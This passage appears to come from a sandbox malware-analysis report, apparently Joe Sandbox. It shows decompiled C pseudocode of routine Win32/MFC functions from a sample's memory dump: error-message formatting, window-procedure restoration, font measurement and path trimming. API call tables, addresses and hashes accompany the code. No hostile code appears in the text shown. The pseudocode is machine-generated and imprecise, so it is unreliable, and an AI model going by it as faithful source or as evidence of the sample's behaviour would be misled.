					if(( *( *(_v20 + 0xc) + _v8 * 2 - 4) & 0x0000ffff) == 0xd) {
						 *( *(_v20 + 0xc) + _v8 * 2 - 4) = 0;
					}
				}
				goto L12;
			}







                  0x00401706
                  0x00401710
                  0x0040181b
                  0x0040181e
                  0x00401824
                  0x00401824
                  0x00401729
                  0x00401734
                  0x00401741
                  0x004017a7
                  0x004017ae
                  0x004017c1
                  0x004017cb
                  0x004017d5
                  0x004017df
                  0x00401813
                  0x004017e1
                  0x004017f4
                  0x004017f9
                  0x004017df
                  0x004017cb
                  0x00000000
                  0x004017ae
                  0x00401750
                  0x00401757
                  0x00401777
                  0x0040178d
                  0x0040179a
                  0x0040179a
                  0x0040178d
                  0x00000000

                  APIs
                  • FormatMessageW.KERNEL32(00001300,00000000,00AA6852,00000400,004013D1,00000000,00000000,004013DD,00000000,00000000,00000000,?,?,?,000000B0,A6E2BCA1), ref: 00401734
                  • lstrlenW.KERNEL32(00000000,?,?,?,000000B0,A6E2BCA1), ref: 0040174A
                  • GetProcessHeap.KERNEL32(?,?,?,000000B0,A6E2BCA1), ref: 004017A1
                  • HeapAlloc.KERNEL32(00000000,00000000,00000040), ref: 004017B8
                  • HandleT.LIBCPMTD ref: 004017D0
                  • swprintf.LIBCMT ref: 004017F4
                  • swprintf.LIBCMT ref: 00401813
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Heapswprintf$AllocFormatHandleMessageProcesslstrlen
                  • String ID: IDispatch error #%d$Unknown error 0x%0lX
                  • API String ID: 326659730-2934499512
                  • Opcode ID: 3573854379ac9e7aa418a57e4558dfa7487c6769b0321bcdc1bbb0c509564e10
                  • Instruction ID: 422e95fc1a98e91328473f5af0246a68e02e148dda8e12045873940090211fc0
                  • Opcode Fuzzy Hash: 3573854379ac9e7aa418a57e4558dfa7487c6769b0321bcdc1bbb0c509564e10
                  • Instruction Fuzzy Hash: DF413878A00219DBDB04DB94C895A7EF3B5FF48710F24C999E915AB3D1C339A942CB94
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040FE0B, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91COMMON
                  Download Yara Rule
                  C-Code - Quality: 96%
                  			E0040FE0B(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				_Unknown_base(*)()* _t31;
				void* _t33;
				void* _t34;
				void* _t40;
				void* _t43;
				void* _t61;
				void* _t65;
				struct HWND__* _t67;
				WCHAR* _t69;
				void* _t72;

				_t65 = __edx;
				_t61 = __ecx;
				_push(0x40);
				E0042925E(E004389D7, __ebx, __edi, __esi);
				_t67 =  *(_t72 + 8);
				_t69 = L"AfxOldWndProc423";
				_t31 = GetPropW(_t67, _t69);
				 *(_t72 - 0x14) =  *(_t72 - 0x14) & 0x00000000;
				 *(_t72 - 4) =  *(_t72 - 4) & 0x00000000;
				 *(_t72 - 0x18) = _t31;
				_t59 = 1;
				_t33 =  *(_t72 + 0xc) - 6;
				if(_t33 == 0) {
					_t34 = E0040E20E(1, _t61,  *(_t72 + 0x14));
					E0040FD1B(_t61, E0040E20E(1, _t61, _t67),  *(_t72 + 0x10), _t34);
					goto L9;
				} else {
					_t40 = _t33 - 0x1a;
					if(_t40 == 0) {
						_t59 = 0 | E0040FD93(1, _t67, E0040E20E(1, _t61, _t67),  *(_t72 + 0x14),  *(_t72 + 0x14) >> 0x10) == 0x00000000;
						L9:
						if(_t59 != 0) {
							goto L10;
						}
					} else {
						_t43 = _t40 - 0x62;
						if(_t43 == 0) {
							SetWindowLongW(_t67, 0xfffffffc,  *(_t72 - 0x18));
							RemovePropW(_t67, _t69);
							GlobalDeleteAtom(GlobalFindAtomW(_t69) & 0x0000ffff);
							goto L10;
						} else {
							if(_t43 != 0x8e) {
								L10:
								 *(_t72 - 0x14) = CallWindowProcW( *(_t72 - 0x18), _t67,  *(_t72 + 0xc),  *(_t72 + 0x10),  *(_t72 + 0x14));
							} else {
								E0040CDB6(E0040E20E(1, _t61, _t67), _t72 - 0x30, _t72 - 0x20);
								 *(_t72 - 0x14) = CallWindowProcW( *(_t72 - 0x18), _t67, 0x110,  *(_t72 + 0x10),  *(_t72 + 0x14));
								E0040EA3B(1, _t65, _t50, _t72 - 0x30,  *((intOrPtr*)(_t72 - 0x20)));
							}
						}
					}
				}
				return E00429303( *(_t72 - 0x14));
			}













                  0x0040fe0b
                  0x0040fe0b
                  0x0040fe0b
                  0x0040fe12
                  0x0040fe17
                  0x0040fe1a
                  0x0040fe21
                  0x0040fe27
                  0x0040fe2b
                  0x0040fe2f
                  0x0040fe37
                  0x0040fe38
                  0x0040fe3b
                  0x0040fee7
                  0x0040fef9
                  0x00000000
                  0x0040fe41
                  0x0040fe41
                  0x0040fe44
                  0x0040fedf
                  0x0040fefe
                  0x0040ff00
                  0x00000000
                  0x00000000
                  0x0040fe46
                  0x0040fe46
                  0x0040fe49
                  0x0040fea2
                  0x0040feaa
                  0x0040febb
                  0x00000000
                  0x0040fe4b
                  0x0040fe50
                  0x0040ff02
                  0x0040ff15
                  0x0040fe56
                  0x0040fe67
                  0x0040fe84
                  0x0040fe8c
                  0x0040fe8c
                  0x0040fe50
                  0x0040fe49
                  0x0040fe44
                  0x0040fe99

                  APIs
                  • __EH_prolog3_catch.LIBCMT ref: 0040FE12
                  • GetPropW.USER32(?,AfxOldWndProc423), ref: 0040FE21
                  • CallWindowProcW.USER32(?,?,00000110,?,00000000), ref: 0040FE7B
                    • Part of subcall function 0040EA3B: GetWindowRect.USER32(?,10000000), ref: 0040EA65
                  • SetWindowLongW.USER32(?,000000FC,?), ref: 0040FEA2
                  • RemovePropW.USER32(?,AfxOldWndProc423), ref: 0040FEAA
                  • GlobalFindAtomW.KERNEL32(AfxOldWndProc423), ref: 0040FEB1
                  • GlobalDeleteAtom.KERNEL32(?), ref: 0040FEBB
                  • CallWindowProcW.USER32(?,?,?,?,00000000), ref: 0040FF0F
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Window$AtomCallGlobalProcProp$DeleteFindH_prolog3_catchLongRectRemove
                  • String ID: AfxOldWndProc423
                  • API String ID: 2109165785-1060338832
                  • Opcode ID: 8fa050ef522dc57d410b088a1a092b66e2ec1793a0042d5a7cc5433b8911896e
                  • Instruction ID: f8b57021eeb41fe86196d7eab97d6f14bb7bbc6d2762c45cacf8da09e7c0055f
                  • Opcode Fuzzy Hash: 8fa050ef522dc57d410b088a1a092b66e2ec1793a0042d5a7cc5433b8911896e
                  • Instruction Fuzzy Hash: 88316D3140011ABBCF11AFE5DD49DBF3A78AF49311F00453AF941B65E1CB3989259BAA
                  Uniqueness

                  Uniqueness Score: 0.25%

                  Function 00418B00, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 62COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00418B00(void* __ecx) {
				struct HDC__* _v8;
				void* _v12;
				int _t9;
				int _t15;
				void* _t20;

				_t9 =  *0x44be98; // 0xffffffff
				if(_t9 == 0xffffffff) {
					_v8 = GetDC(0);
					_v12 = 0;
					_t20 = CreateFontW(GetSystemMetrics(0x48), 0, 0, 0, 0x190, 0, 0, 0, 2, 0, 0, 0, 0, L"Marlett");
					if(_t20 != 0) {
						_v12 = SelectObject(_v8, _t20);
					}
					GetCharWidthW(_v8, 0x36, 0x36, 0x44be98);
					if(_t20 != 0) {
						SelectObject(_v8, _v12);
						DeleteObject(_t20);
					}
					ReleaseDC(0, _v8);
					_t15 =  *0x44be98; // 0xffffffff
					return _t15;
				}
				return _t9;
			}








                  0x00418b07
                  0x00418b0f
                  0x00418b39
                  0x00418b3c
                  0x00418b52
                  0x00418b56
                  0x00418b5e
                  0x00418b5e
                  0x00418b6d
                  0x00418b75
                  0x00418b7d
                  0x00418b80
                  0x00418b80
                  0x00418b8a
                  0x00418b90
                  0x00000000
                  0x00418b97
                  0x00418b99

                  APIs
                  • GetDC.USER32(00000000), ref: 00418B1B
                  • GetSystemMetrics.USER32(00000048), ref: 00418B3F
                  • CreateFontW.GDI32(00000000), ref: 00418B46
                  • SelectObject.GDI32(?,00000000), ref: 00418B5C
                  • GetCharWidthW.GDI32(?,00000036,00000036,0044BE98), ref: 00418B6D
                  • SelectObject.GDI32(?,?), ref: 00418B7D
                  • DeleteObject.GDI32(00000000), ref: 00418B80
                  • ReleaseDC.USER32(00000000,?), ref: 00418B8A
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Object$Select$CharCreateDeleteFontMetricsReleaseSystemWidth
                  • String ID: Marlett
                  • API String ID: 1397664628-3688754224
                  • Opcode ID: 6caf2bfb82a8d46b7e7f404735aa05f80573a3b8cedf80b6b3b22035bf1fe089
                  • Instruction ID: 7bf321f048335a127b4d7deff5af8732c8b2c0d0c610d5f16170f5e97c4d2792
                  • Opcode Fuzzy Hash: 6caf2bfb82a8d46b7e7f404735aa05f80573a3b8cedf80b6b3b22035bf1fe089
                  • Instruction Fuzzy Hash: D2118E71981224BFCB215FA29C4DDCFBE3CEF567A1F200025F208A21A0C7B54E50DBA8
                  Uniqueness

                  Uniqueness Score: 1.69%

                  Function 00413605, Relevance: 15.3, APIs: 10, Instructions: 301UNIQUE
                  Download Yara Rule
                  C-Code - Quality: 83%
                  			E00413605(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t157;
				intOrPtr* _t159;
				void* _t160;
				intOrPtr* _t177;
				intOrPtr* _t179;
				intOrPtr* _t181;
				intOrPtr* _t183;
				intOrPtr* _t185;
				intOrPtr* _t187;
				intOrPtr* _t189;
				intOrPtr* _t193;
				signed int _t194;
				intOrPtr* _t195;
				void* _t196;
				intOrPtr* _t197;
				intOrPtr _t199;
				intOrPtr _t200;
				intOrPtr _t202;
				intOrPtr _t203;
				intOrPtr* _t211;
				signed int _t212;
				signed int _t224;
				signed int _t230;
				intOrPtr* _t231;
				void* _t232;
				signed int _t279;
				signed int _t280;
				signed int _t289;
				WCHAR* _t318;
				intOrPtr* _t324;
				intOrPtr* _t325;
				signed int _t326;
				void* _t328;
				void* _t329;
				void* _t330;
				void* _t338;

				_push(0x28);
				_t157 = E0042922B(E00438D02, __ebx, __edi, __esi);
				_t328 = __ecx;
				_t323 = 1;
				if( *((intOrPtr*)(__ecx + 0x78)) != 1) {
					L29:
					return E00429303(_t157);
				}
				_t159 =  *((intOrPtr*)(__ecx + 0x80));
				_t160 =  *((intOrPtr*)( *_t159 + 0x50))(_t159, _t329 - 0x28);
				_t245 = 0;
				if(_t160 < 0) {
					__eflags =  *( *((intOrPtr*)(__ecx + 0x74)) + 0x34) & 0x00000200;
					if(__eflags == 0) {
						L28:
						_push(_t329 - 0x24);
						_t324 = E004131FC(_t245, _t328, _t323, _t328, _t338);
						_push(_t329 - 0x2c);
						 *(_t329 - 4) = 2;
						 *((short*)( *((intOrPtr*)(_t328 + 0x74)) + 0x38)) =  *((intOrPtr*)( *_t324 - 0xc)) -  *((intOrPtr*)( *((intOrPtr*)(E004133B9(_t245, _t328, _t324, _t328, _t338))) - 0xc));
						E004055F0( *((intOrPtr*)(_t329 - 0x2c)) + 0xfffffff0);
						 *(_t329 - 4) =  *(_t329 - 4) | 0xffffffff;
						E004055F0( *((intOrPtr*)(_t329 - 0x24)) + 0xfffffff0);
						_push(_t329 - 0x34);
						_t325 = E004131FC(_t245, _t328, _t324, _t328, _t338);
						_push(_t329 - 0x30);
						 *(_t329 - 4) = 3;
						 *((short*)( *((intOrPtr*)(_t328 + 0x74)) + 0x3a)) =  *((intOrPtr*)( *_t325 - 0xc)) -  *((intOrPtr*)( *((intOrPtr*)(E004134AC(_t245, _t328, _t325, _t328, _t338))) - 0xc));
						E004055F0( *((intOrPtr*)(_t329 - 0x30)) + 0xfffffff0);
						_t157 = E004055F0( *((intOrPtr*)(_t329 - 0x34)) + 0xfffffff0);
						goto L29;
					}
					_t177 =  *((intOrPtr*)(__ecx + 0x80));
					 *((intOrPtr*)(_t329 - 0x24)) = 0;
					__eflags =  *((intOrPtr*)( *_t177))(_t177, 0x43e198, _t329 - 0x24);
					if(__eflags < 0) {
						goto L28;
					}
					_t179 =  *((intOrPtr*)(_t329 - 0x24));
					 *((intOrPtr*)(_t329 - 0x20)) = 0;
					__eflags =  *((intOrPtr*)( *_t179 + 0x6c))(_t179, _t329 - 0x20);
					if(__eflags < 0) {
						L26:
						_t181 =  *((intOrPtr*)(_t329 - 0x24));
						L27:
						 *((intOrPtr*)( *_t181 + 8))(_t181);
						goto L28;
					}
					_t183 =  *((intOrPtr*)(_t329 - 0x20));
					__eflags =  *((intOrPtr*)( *_t183 + 0x24))(_t183, _t329 - 0x1c);
					if(__eflags < 0) {
						L25:
						_t185 =  *((intOrPtr*)(_t329 - 0x20));
						 *((intOrPtr*)( *_t185 + 8))(_t185);
						goto L26;
					}
					_t187 =  *((intOrPtr*)(_t329 - 0x1c));
					 *((intOrPtr*)(_t329 - 0x2c)) = 0;
					__eflags =  *((intOrPtr*)( *_t187 + 0xc))(_t187, 1, _t329 - 0x18, _t329 - 0x2c);
					if(__eflags != 0) {
						L24:
						_t189 =  *((intOrPtr*)(_t329 - 0x1c));
						 *((intOrPtr*)( *_t189 + 8))(_t189);
						goto L25;
					}
					E00404820(_t329 - 0x14);
					_t313 = _t329 - 0x10;
					 *(_t329 - 4) = 1;
					_t323 =  *((intOrPtr*)( *((intOrPtr*)(_t328 + 0x74)) + 0x1c));
					_t193 =  *((intOrPtr*)(_t329 - 0x18));
					 *(_t329 - 0x10) = 0;
					_t194 =  *((intOrPtr*)( *_t193 + 0x14))(_t193, 0x80058000, _t329 - 0x10);
					__eflags = _t194;
					if(_t194 >= 0) {
						PathRemoveFileSpecW( *(_t329 - 0x10));
						__eflags =  *( *((intOrPtr*)(_t328 + 0x74)) + 0x20) - 1;
						E0042AAF2(_t313, _t323,  *( *((intOrPtr*)(_t328 + 0x74)) + 0x20) - 1,  *(_t329 - 0x10), 0xffffffff);
						_t230 = E00429211( *(_t329 - 0x10));
						_t330 = _t330 + 0x14;
						_t323 = _t323 + 2 + _t230 * 2;
						__imp__CoTaskMemFree( *(_t329 - 0x10));
					}
					while(1) {
						_t195 =  *((intOrPtr*)(_t329 - 0x18));
						 *(_t329 - 0x10) = _t245;
						_t196 =  *((intOrPtr*)( *_t195 + 0x14))(_t195, 0x80058000, _t329 - 0x10);
						__eflags = _t196 - _t245;
						if(_t196 >= _t245) {
							E00405C40(_t329 - 0x14,  *(_t329 - 0x10));
							PathRemoveFileSpecW(E00412509(_t329 - 0x14));
							E0040E100(_t245, _t329 - 0x14, _t323, 0xffffffff);
							_t289 =  *( *((intOrPtr*)(_t329 - 0x14)) - 0xc);
							_t318 =  *(_t329 - 0x10);
							__eflags = _t318[_t289] - 0x5c;
							if(_t318[_t289] == 0x5c) {
								__eflags = _t289;
							}
							E0042AAF2(_t318, _t323,  *( *((intOrPtr*)(_t328 + 0x74)) + 0x20) - (_t323 -  *((intOrPtr*)( *((intOrPtr*)(_t328 + 0x74)) + 0x1c)) >> 1) - 1, _t289 + _t289 + _t318, 0xffffffff);
							_t224 = E00429211(_t289 + _t289 +  *(_t329 - 0x10));
							_t330 = _t330 + 0x14;
							_t323 = _t323 + 2 + _t224 * 2;
							__imp__CoTaskMemFree( *(_t329 - 0x10));
							_t245 = 0;
							__eflags = 0;
						}
						_t197 =  *((intOrPtr*)(_t329 - 0x18));
						 *((intOrPtr*)( *_t197 + 8))(_t197);
						_t199 =  *((intOrPtr*)(_t328 + 0x74));
						_t279 =  *(_t199 + 0x20);
						_t200 =  *((intOrPtr*)(_t199 + 0x1c));
						__eflags = _t323 - _t200 + _t279 * 2 - 2;
						if(_t323 >= _t200 + _t279 * 2 - 2) {
							break;
						}
						_t211 =  *((intOrPtr*)(_t329 - 0x1c));
						_t212 =  *((intOrPtr*)( *_t211 + 0xc))(_t211, 1, _t329 - 0x18, _t329 - 0x2c);
						__eflags = _t212;
						if(_t212 == 0) {
							continue;
						}
						break;
					}
					_t202 =  *((intOrPtr*)(_t328 + 0x74));
					_t280 =  *(_t202 + 0x20);
					_t203 =  *((intOrPtr*)(_t202 + 0x1c));
					__eflags = _t323 - _t203 + _t280 * 2 - 2;
					if(_t323 >= _t203 + _t280 * 2 - 2) {
						__eflags = 0;
						 *((short*)( *((intOrPtr*)( *((intOrPtr*)(_t328 + 0x74)) + 0x1c)) +  *( *((intOrPtr*)(_t328 + 0x74)) + 0x20) * 2 - 4)) = 0;
						 *((short*)( *((intOrPtr*)( *((intOrPtr*)(_t328 + 0x74)) + 0x1c)) +  *( *((intOrPtr*)(_t328 + 0x74)) + 0x20) * 2 - 2)) = 0;
					} else {
						 *_t323 = 0;
					}
					 *(_t329 - 4) =  *(_t329 - 4) | 0xffffffff;
					__eflags =  *((intOrPtr*)(_t329 - 0x14)) + 0xfffffff0;
					E004055F0( *((intOrPtr*)(_t329 - 0x14)) + 0xfffffff0);
					goto L24;
				}
				_t231 =  *((intOrPtr*)(_t329 - 0x28));
				_t319 = _t329 - 0x10;
				 *(_t329 - 0x10) = 0;
				_t232 =  *((intOrPtr*)( *_t231 + 0x14))(_t231, 0x80058000, _t329 - 0x10);
				_t335 = _t232;
				if(_t232 >= 0) {
					_push( *(_t329 - 0x10));
					E00410F00(0, _t329 - 0x14, 1, __ecx, _t335);
					 *(_t329 - 4) = 0;
					PathRemoveFileSpecW(E00412509(_t329 - 0x14));
					_t245 = 0xffffffff;
					E0040E100(0xffffffff, _t329 - 0x14, 1, 0xffffffff);
					_t326 =  *( *((intOrPtr*)(_t329 - 0x14)) - 0xc);
					_t298 =  *(_t329 - 0x10);
					if(( *(_t329 - 0x10))[_t326] == 0x5c) {
						_t326 = _t326 + 1;
					}
					E0042AAF2(_t319,  *((intOrPtr*)( *((intOrPtr*)(_t328 + 0x74)) + 0x1c)),  *( *((intOrPtr*)(_t328 + 0x74)) + 0x20) - 1, _t298, _t245);
					E0042AAF2(_t319,  *((intOrPtr*)( *((intOrPtr*)(_t328 + 0x74)) + 0x24)),  *((intOrPtr*)( *((intOrPtr*)(_t328 + 0x74)) + 0x28)),  &(( *(_t329 - 0x10))[_t326]), _t245);
					_t323 =  *((intOrPtr*)(_t328 + 0x74));
					 *((short*)( *((intOrPtr*)(_t323 + 0x1c)) + 2 + E00429211( *((intOrPtr*)(_t323 + 0x1c))) * 2)) = 0;
					__imp__CoTaskMemFree( *(_t329 - 0x10));
					_t338 =  *((intOrPtr*)(_t329 - 0x14)) + 0xfffffff0;
					 *(_t329 - 4) = _t245;
					E004055F0( *((intOrPtr*)(_t329 - 0x14)) + 0xfffffff0);
				}
				_t181 =  *((intOrPtr*)(_t329 - 0x28));
				goto L27;
			}







































                  0x00413605
                  0x0041360c
                  0x00413611
                  0x00413615
                  0x00413619
                  0x0041397a
                  0x0041397f
                  0x0041397f
                  0x0041361f
                  0x0041362c
                  0x0041362f
                  0x00413633
                  0x004136f2
                  0x004136f9
                  0x004138e6
                  0x004138e9
                  0x004138f1
                  0x004138f6
                  0x004138f9
                  0x00413914
                  0x0041391e
                  0x00413926
                  0x0041392d
                  0x00413935
                  0x0041393d
                  0x00413942
                  0x00413945
                  0x00413960
                  0x0041396a
                  0x00413975
                  0x00000000
                  0x00413975
                  0x004136ff
                  0x0041370e
                  0x00413716
                  0x00413718
                  0x00000000
                  0x00000000
                  0x0041371e
                  0x00413725
                  0x0041372e
                  0x00413730
                  0x004138dd
                  0x004138dd
                  0x004138e0
                  0x004138e3
                  0x00000000
                  0x004138e3
                  0x00413736
                  0x00413743
                  0x00413745
                  0x004138d4
                  0x004138d4
                  0x004138da
                  0x00000000
                  0x004138da
                  0x0041374b
                  0x00413757
                  0x00413760
                  0x00413762
                  0x004138cb
                  0x004138cb
                  0x004138d1
                  0x00000000
                  0x004138d1
                  0x0041376b
                  0x00413773
                  0x00413777
                  0x0041377a
                  0x0041377d
                  0x00413785
                  0x0041378b
                  0x0041378e
                  0x00413790
                  0x00413795
                  0x004137a6
                  0x004137a9
                  0x004137b1
                  0x004137b6
                  0x004137bc
                  0x004137c0
                  0x004137c0
                  0x004137c6
                  0x004137c6
                  0x004137d2
                  0x004137d8
                  0x004137db
                  0x004137dd
                  0x004137e5
                  0x004137f3
                  0x004137fe
                  0x00413806
                  0x00413809
                  0x0041380c
                  0x00413811
                  0x00413813
                  0x00413813
                  0x0041382f
                  0x0041383a
                  0x0041383f
                  0x00413845
                  0x00413849
                  0x0041384f
                  0x0041384f
                  0x0041384f
                  0x00413851
                  0x00413857
                  0x0041385a
                  0x0041385d
                  0x00413860
                  0x00413867
                  0x00413869
                  0x00000000
                  0x00000000
                  0x0041386b
                  0x0041387b
                  0x0041387e
                  0x00413880
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00413880
                  0x00413886
                  0x00413889
                  0x0041388c
                  0x00413893
                  0x00413895
                  0x004138a7
                  0x004138a9
                  0x004138b7
                  0x00413897
                  0x00413899
                  0x00413899
                  0x004138bf
                  0x004138c3
                  0x004138c6
                  0x00000000
                  0x004138c6
                  0x00413639
                  0x0041363c
                  0x00413645
                  0x0041364b
                  0x0041364e
                  0x00413650
                  0x00413656
                  0x0041365c
                  0x00413664
                  0x0041366d
                  0x00413673
                  0x0041367a
                  0x00413682
                  0x00413685
                  0x0041368d
                  0x0041368f
                  0x0041368f
                  0x0041369d
                  0x004136b3
                  0x004136b8
                  0x004136cb
                  0x004136d3
                  0x004136dc
                  0x004136df
                  0x004136e2
                  0x004136e2
                  0x004136e7
                  0x00000000

                  APIs
                  • __EH_prolog3.LIBCMT ref: 0041360C
                  • PathRemoveFileSpecW.SHLWAPI(00000000), ref: 0041366D
                  • _wcslen.LIBCMT ref: 004136BE
                  • CoTaskMemFree.OLE32(?), ref: 004136D3
                  • PathRemoveFileSpecW.SHLWAPI(?), ref: 00413795
                  • _wcslen.LIBCMT ref: 004137B1
                  • CoTaskMemFree.OLE32(?), ref: 004137C0
                  • PathRemoveFileSpecW.SHLWAPI(00000000), ref: 004137F3
                    • Part of subcall function 00410F00: __EH_prolog3.LIBCMT ref: 00410F07
                    • Part of subcall function 00410F00: _DebugHeapAllocator.LIBCPMTD ref: 00410F35
                  • _wcslen.LIBCMT ref: 0041383A
                  • CoTaskMemFree.OLE32(?), ref: 00413849
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: FileFreePathRemoveSpecTask_wcslen$H_prolog3$AllocatorDebugHeap
                  • String ID:
                  • API String ID: 865463310-0
                  • Opcode ID: 8f7a1aefae79caaeb176ef5cbfe06fd0edf6fea990f5910b5767b2e7b65f2a73
                  • Instruction ID: 05f6ec17bae3d0c622d2692c3c51bd0e58be28d221e8f94d8a5f5602e28de85d
                  • Opcode Fuzzy Hash: 8f7a1aefae79caaeb176ef5cbfe06fd0edf6fea990f5910b5767b2e7b65f2a73
                  • Instruction Fuzzy Hash: F4C14B70A0050AEFCB04DFA8C985DAEB7B5FF88314B10465DF512AB3A1DB35AD45CB64
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 00401D80, Relevance: 15.2, APIs: 10, Instructions: 157memoryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 90%
                  			E00401D80(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, signed int _a28) {
				char _v8;
				char _v16;
				char _v20;
				char _v24;
				signed int _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed int _t73;
				void* _t82;
				signed char _t92;
				void* _t100;
				void* _t114;
				void* _t118;
				void* _t171;
				void* _t172;
				signed int _t173;
				void* _t174;
				void* _t175;

				_push(0xffffffff);
				_push(E004383F0);
				_push( *[fs:0x0]);
				_t175 = _t174 - 0x20;
				_t73 =  *0x44c364; // 0xa6e2bca1
				_push(_t73 ^ _t173);
				 *[fs:0x0] =  &_v16;
				if(_a20 != 0) {
					E00404EB0(_t118, _a16, _t171, _t172, 0x443404);
				}
				E00404820( &_v24);
				_v8 = 0;
				E00404820( &_v20);
				_v8 = 1;
				_v28 = 0;
				while(_v28 < _a8) {
					_v32 = _v28 * 0x4c + _a4;
					_t92 = E00401FA0(_v32 + 0x10, _v32 + 0x10, _a24);
					_t175 = _t175 + 8;
					if((_t92 & 0x000000ff) == 0) {
						E00404FB0( &_v36,  *((intOrPtr*)(_v32 + 0x2c)));
						_v8 = 2;
						_v44 = E00404FB0( &_v40,  *((intOrPtr*)(_v32 + 0x28)));
						_v48 = _v44;
						_v8 = 3;
						_t100 = E004049A0( &_v20, E0040A540(_v48));
						_v8 = 2;
						E00404FD0(_t100,  &_v40);
						E004049A0( &_v20, 0x43ab7c);
						E004049A0( &_v20, E0040A540( &_v36));
						E004049A0( &_v20, 0x43ab78);
						E00404A40( &_v20, _a28 & 0x0000ffff);
						E004049A0( &_v20, E0040A540( &_v36));
						E00404A40( &_v20, _a28 & 0x0000ffff);
						E00404EB0(_t118, _a16, _t171, _t172, _v32 + 0x10);
						if((E00404E60( &_v24) & 0x000000ff) == 0) {
							E004049A0( &_v24, 0x43ab74);
						}
						_t114 = E004049A0( &_v24, E0040A540( &_v36));
						_v8 = 1;
						E00404FD0(_t114,  &_v36);
					}
					_v28 = _v28 + 1;
				}
				if(_a20 != 0) {
					E00404DA0(_a12, _a20);
					E00404DC0(_a12, _a28 & 0x0000ffff);
					E00404D80(_a12,  &_v24);
					E00404DC0(_a12, _a28 & 0x0000ffff);
				}
				E00404D80(_a12,  &_v20);
				E00404DC0(_a12, _a28 & 0x0000ffff);
				if(E0040B290(_a16) == 0) {
					E00404DC0(_a12, _a28 & 0x0000ffff);
				}
				_v8 = 0;
				E00404840( &_v20);
				_v8 = 0xffffffff;
				_t82 = E00404840( &_v24);
				 *[fs:0x0] = _v16;
				return _t82;
			}
























                  0x00401d83
                  0x00401d85
                  0x00401d90
                  0x00401d91
                  0x00401d94
                  0x00401d9b
                  0x00401d9f
                  0x00401da9
                  0x00401db3
                  0x00401db3
                  0x00401dbb
                  0x00401dc0
                  0x00401dca
                  0x00401dcf
                  0x00401dd3
                  0x00401de5
                  0x00401dfa
                  0x00401e08
                  0x00401e0d
                  0x00401e15
                  0x00401e25
                  0x00401e2a
                  0x00401e3d
                  0x00401e43
                  0x00401e46
                  0x00401e56
                  0x00401e5b
                  0x00401e62
                  0x00401e6f
                  0x00401e80
                  0x00401e8d
                  0x00401e9a
                  0x00401eab
                  0x00401eb8
                  0x00401ec7
                  0x00401ed9
                  0x00401ee3
                  0x00401ee3
                  0x00401ef4
                  0x00401ef9
                  0x00401f00
                  0x00401f00
                  0x00401de2
                  0x00401de2
                  0x00401f0e
                  0x00401f17
                  0x00401f24
                  0x00401f30
                  0x00401f3d
                  0x00401f3d
                  0x00401f49
                  0x00401f56
                  0x00401f65
                  0x00401f6f
                  0x00401f6f
                  0x00401f74
                  0x00401f7b
                  0x00401f80
                  0x00401f8a
                  0x00401f92
                  0x00401f9d

                  APIs
                  • _DebugHeapAllocator.LIBCPMTD ref: 00401E56
                  • _DebugHeapAllocator.LIBCPMTD ref: 00401E6F
                  • _DebugHeapAllocator.LIBCPMTD ref: 00401E80
                  • _DebugHeapAllocator.LIBCPMTD ref: 00401E8D
                  • _DebugHeapAllocator.LIBCPMTD ref: 00401EAB
